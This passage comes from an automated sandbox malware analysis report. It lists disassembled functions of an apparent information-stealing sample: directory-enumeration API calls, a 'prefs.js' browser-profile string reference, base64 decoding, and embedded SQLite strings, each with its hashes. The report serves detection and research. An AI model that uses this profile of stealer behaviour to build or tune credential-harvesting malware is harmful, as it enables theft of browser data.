Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
Instruction ID: 08a60fc229ca929b4850671bf03eed3452f9cad2ea52f9bb94d0a5c68b8f0e05
Opcode Fuzzy Hash: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
Instruction Fuzzy Hash: 68F039B0C4830A9FCB009FA5DAC5A0DBBE8EB84258F14C46DE8988F710D334E580CB51

Non-executed Functions

Function 00413B00 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00413B1C
FindFirstFileA.KERNEL32(?,?), ref: 00413B33
lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
FindClose.KERNEL32(000000FF), ref: 00413ECC

Strings

%s\%s, xrefs: 00413BCA
q?A, xrefs: 00413ED2, 00413E95, 00413DB9, 00413B59, 00413DBC, 00413E98
%s\*, xrefs: 00413B10
%s%s, xrefs: 00413CFD
%s\%s, xrefs: 00413CBF
%s\%s\%s, xrefs: 00413C9A

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
API String ID: 1125553467-4052298153
Opcode ID: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
Opcode Fuzzy Hash: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66

Function 61E4304E Relevance: 31.5, APIs: 1, Strings: 19, Instructions: 1527COMMON

Download Yara Rule

Strings

true, xrefs: 61E43181
aggregate, xrefs: 61E4434A
ambiguous column name, xrefs: 61E43DC3
excluded, xrefs: 61E438A5
new, xrefs: 61E43838
M, xrefs: 61E43A55
window, xrefs: 61E44351
subqueries, xrefs: 61E447D9
non-deterministic functions, xrefs: 61E44232
H, xrefs: 61E43766
false, xrefs: 61E43198
old, xrefs: 61E4386A
no such column, xrefs: 61E43DC8
main, xrefs: 61E4331F
the "." operator, xrefs: 61E43209
ROWID, xrefs: 61E43F8E
parameters, xrefs: 61E4482B
Q{a, xrefs: 61E4465A
za, xrefs: 61E448C1

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: za$H$M$Q{a$ROWID$aggregate$ambiguous column name$excluded$false$main$new$no such column$non-deterministic functions$old$parameters$subqueries$the "." operator$true$window
API String ID: 0-995943838
Opcode ID: 33a4bf6f428ee4edd743105bfae109be89976f240395f77ce69a64c47f31ce08
Instruction ID: 1d323ea87534b4984c39532d96b7a68bc5a2d3eb5612128e3b04e89f7f046be3
Opcode Fuzzy Hash: 33a4bf6f428ee4edd743105bfae109be89976f240395f77ce69a64c47f31ce08
Instruction Fuzzy Hash: 9AF25A74A042658FEB20CF68D980B99BBF1BF49308F24C5DAD8999B391D770E985CF50

Function 004147C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
HeapAlloc.KERNEL32(00000000), ref: 004147D7
wsprintfA.USER32 ref: 004147F6
FindFirstFileA.KERNEL32(?,?), ref: 0041480D
StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
FindClose.KERNEL32(000000FF), ref: 004148F0
lstrcatA.KERNEL32(?,0096C4E8,?,00000104), ref: 00414915
lstrcatA.KERNEL32(?,00974900), ref: 00414928
lstrlenA.KERNEL32(?), ref: 00414935
lstrlenA.KERNEL32(?), ref: 00414946

Strings

%s\*, xrefs: 004147EA
%s\%s, xrefs: 0041486B

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
Opcode Fuzzy Hash: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95

Function 61E94783 Relevance: 22.4, Strings: 17, Instructions: 1152COMMON

Download Yara Rule

Strings

4, xrefs: 61E94E16
compress, xrefs: 61E950C7
a, xrefs: 61E9543E
uncompress, xrefs: 61E950CC
@Da, xrefs: 61E94970
content, xrefs: 61E94C7D
__langid, xrefs: 61E9554B
8a, xrefs: 61E950D1
bua, xrefs: 61E95230
va, xrefs: 61E9518C
simple, xrefs: 61E94CA1
, ?, xrefs: 61E952EC
bua, xrefs: 61E95118
rowid, xrefs: 61E951BE
bua, xrefs: 61E95282
fts3, xrefs: 61E9578D
_content, xrefs: 61E958F1

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: free
String ID: , ?$4$8a$@Da$__langid$_content$bua$bua$bua$compress$content$fts3$rowid$simple$uncompress$va$a
API String ID: 1294909896-3798220086
Opcode ID: 04e785ddea65c3160c7319b53b62be90c5ffadaedcfade183d905f9c131a88bc
Instruction ID: ef7f48c3fdd7dc8ca6414c769173e2ec05d9438d07e734940b1c5d50411cadd4
Opcode Fuzzy Hash: 04e785ddea65c3160c7319b53b62be90c5ffadaedcfade183d905f9c131a88bc
Instruction Fuzzy Hash: 40C2B0B49083598FDB10CFA8C58479DBBF1AF88318F2589AED898AB341D774D985CF41

Function 0040EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040EE3E
FindFirstFileA.KERNEL32(?,?), ref: 0040EE55
StrCmpCA.SHLWAPI(?,00421630), ref: 0040EEAB
StrCmpCA.SHLWAPI(?,00421634), ref: 0040EEC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0040F3AE
FindClose.KERNEL32(000000FF), ref: 0040F3C3

Strings

%s\*.*, xrefs: 0040EE32

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 8e810b1e1299696a84cd716ff2cb3521fe6dcebbbb688be2a24adbf32e873b7e
Instruction ID: d58f243a0e81953373eaf00141ed8e3e8bc28467f540fc5aad09a1a01b74b281
Opcode Fuzzy Hash: 8e810b1e1299696a84cd716ff2cb3521fe6dcebbbb688be2a24adbf32e873b7e
Instruction Fuzzy Hash: 79E16371A121189ADB14FB61DC62EEE7339AF50314F4045EEB10A62092EF386BD9CF59

Function 61E9E24F Relevance: 17.1, Strings: 13, Instructions: 869COMMON

Download Yara Rule

Strings

k PRIMARY KEY, v, xrefs: 61E9ECC4
docsize, xrefs: 61E9ECA4, 61E9EE46
content, xrefs: 61E9E6BE, 61E9EC68, 61E9EE3F
config, xrefs: 61E9ECC9
id INTEGER PRIMARY KEY, sz BLOB, xrefs: 61E9EC9F
id INTEGER PRIMARY KEY, block BLOB, xrefs: 61E9EACC
rowid, xrefs: 61E9E89A, 61E9E993
version, xrefs: 61E9ECE8
data, xrefs: 61E9EAD1
idx, xrefs: 61E9EAF7
bua, xrefs: 61E9E43E
bua, xrefs: 61E9ED4E
segid, term, pgno, PRIMARY KEY(segid, term), xrefs: 61E9EAF2

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID:
String ID: bua$bua$config$content$data$docsize$id INTEGER PRIMARY KEY, block BLOB$id INTEGER PRIMARY KEY, sz BLOB$idx$k PRIMARY KEY, v$rowid$segid, term, pgno, PRIMARY KEY(segid, term)$version
API String ID: 0-2268357529
Opcode ID: f0ae7c2a6ac9ca1115cba7e4b0d4d22d6b6e90ba2b269ecf27a188f44c4a7483
Instruction ID: f9c2f8dafde392a94833a84278d27f7abaf5337b7a20f26a6dc113648fca896e
Opcode Fuzzy Hash: f0ae7c2a6ac9ca1115cba7e4b0d4d22d6b6e90ba2b269ecf27a188f44c4a7483
Instruction Fuzzy Hash: FE8206B49046499FDB10CFA9C18079DBBF1BF89318F25C92EE894AB395D774D881CB42

Function 0040DF10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
FindClose.KERNEL32(000000FF), ref: 0040E4F2

Strings

4@, xrefs: 0040DF32, 0040E500, 0040DFF3, 0040DF75, 0040DFF6
\*.*, xrefs: 0040DF26

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: 4@$\*.*
API String ID: 2325840235-1993203227
Opcode ID: e02c36ebd5ef7547e0fa1ccff715018f32a25fe0a66858dde4490393c2ac4efe
Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
Opcode Fuzzy Hash: e02c36ebd5ef7547e0fa1ccff715018f32a25fe0a66858dde4490393c2ac4efe
Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A

Function 0040F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004216B0,00420D97), ref: 0040F81E
StrCmpCA.SHLWAPI(?,004216B4), ref: 0040F86F
StrCmpCA.SHLWAPI(?,004216B8), ref: 0040F885
FindNextFileA.KERNEL32(000000FF,?), ref: 0040FBB1
FindClose.KERNEL32(000000FF), ref: 0040FBC3

Strings

prefs.js, xrefs: 0040F912

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: fa7978816ecf7266b691bd054db9c823c8232bfad1804aae5ed7943e4e66fe35
Instruction ID: 41002e5bbb8aa5eaa1de2a73ae7baa64e6dc855d43d68c47d205a656f8df75cd
Opcode Fuzzy Hash: fa7978816ecf7266b691bd054db9c823c8232bfad1804aae5ed7943e4e66fe35
Instruction Fuzzy Hash: 84B19371A011089BCB24FF61DC96FEE7379AF54304F0045AEA50A57191EF386B98CF9A

Function 0040DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215A8,00420BAF), ref: 0040DBEB
StrCmpCA.SHLWAPI(?,004215AC), ref: 0040DC33
StrCmpCA.SHLWAPI(?,004215B0), ref: 0040DC49
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DECC
FindClose.KERNEL32(000000FF), ref: 0040DEDE

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 2ff1cb5bcd9e8e085842ff8f0fe9f89c2148c72051bc76be1909f871fd55977c
Instruction ID: c85deeef17d72a94dc1f170446f25d55197e78b42259dde6f56d7dfc7a2e5770
Opcode Fuzzy Hash: 2ff1cb5bcd9e8e085842ff8f0fe9f89c2148c72051bc76be1909f871fd55977c
Instruction Fuzzy Hash: 40917572A001049BCB14FBB1ED96DED733DAF84344F00456EF90666185EE38AB5CCB9A

Function 61EA2F47 Relevance: 11.8, APIs: 2, Strings: 5, Instructions: 1261COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61EA3821
memcmp.MSVCRT ref: 61EA397C

Strings

UPDATE, xrefs: 61EA3C5F
optimize, xrefs: 61EA3281
DELETE from, xrefs: 61EA3C5A
docsize, xrefs: 61EA3F81
content, xrefs: 61EA356B

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memcmp
String ID: DELETE from$UPDATE$content$docsize$optimize
API String ID: 1475443563-624765053
Opcode ID: 8383cfa403177ec0fc50be48f88878691afb5600a2be6e23d8c4aafd1dd02aee
Instruction ID: 70c6a14bc8af06d6aef6aa9ad5cb9e7fc1cc1a093b7b28355e50790c232760be
Opcode Fuzzy Hash: 8383cfa403177ec0fc50be48f88878691afb5600a2be6e23d8c4aafd1dd02aee
Instruction Fuzzy Hash: ABC2F674A042598FDB10DFA8C980B8DBBF1BF88308F2585A9D849AB345D774ED85CF81

Function 0040C920 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C953
lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0096C398), ref: 0040C971
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
memcpy.MSVCRT(?,?,?), ref: 0040CA12
lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
